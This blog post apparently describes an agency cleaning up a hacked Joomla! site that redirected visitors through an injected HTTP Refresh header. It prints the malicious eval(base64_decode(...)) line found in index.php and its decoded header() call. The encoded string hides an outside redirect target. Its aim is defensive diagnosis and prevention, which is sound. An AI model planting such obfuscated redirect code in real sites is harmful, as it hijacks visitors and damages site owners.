Joomla! refresh hack

Post: 1 December 2012 by kriss in: Security Print

Recently, one of our clients went into issues with their Joomla! website. The website was keeping redirecting to another website, namely, after exactly 25 seconds. Upon acknowledging the problem, we immediately understood that the website was just another hacked Joomla! website.

The first thing we did, after changing passwords and bringing the website down before Google blacklists it, was to turn off JavaScript to determine if the source of the problem was one of the many JavaScript malwares which sometimes make their way to unsecure websites. To our surprise, the website kept redirecting us after the same delay, but at least, it was now clear that another redirect technique was used.

Thorough inspection of the HTML source code revealed nothing interesting, or at least, no <meta> refresh tag, as what may first come to one's mind upon thinking of non-JavaScript redirect. But redirects may also happen at the protocol level, and indeed, the network monitor was much more friendly since we were able to capture an interesting header from the HTTP response:

Refresh: 25; url=""

Let's not forget that Refresh: is a valid HTTP header, hence the need to use http-equiv attribute when you use it from a <meta> tag. With this header caught, the cause of the redirect after 25 seconds to that website became suddenly obvious. But we still had to discover where this header was injected from.

A quick search for the malicious use or evil PHP functions eval() and base64_decode() revealed that the only file concerned was index.php, at the root of the Joomla! install. This file being executed each time a page is shown, it's a good target for an attacker since whatever bad code it contains will be run each time. The file contained the following line between the first two require_once():


  1. eval(base64_decode('aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL3Nob3BcIiIpOw=='));

Evaluating this string after having base64-decoded it, of course, results in running the following code :


  1. header("Refresh: 25; url=\"\"");

Now that the source of the problem has been found, the last step was to get rid of it by removing this line, and bring the website up again to make sure that the redirect is gone. As usual, we had to investigate with the client to explain how this single line of PHP code could have been injected in a file on the server in the first place.

Whereas we did not discovered any backdoors on the website, it turned out that our client used a very insecure administrator password that is listed in the top ten most insecure passwords, and that their website was also using some Joomla! extensions which contain known vulnerabilites. As this combination of security weaknesses likely led to this injection of code, they confirmed that the website remained clean for weeks, after we recommended to uninstall the unsecure extensions and to use only secure passwords.

If you are affected with the same problem, we hope that this article will help you to solve it without too much hassle. And remember that this kind of problem can be easily prevented by using strong passwords and secure or up to date extensions.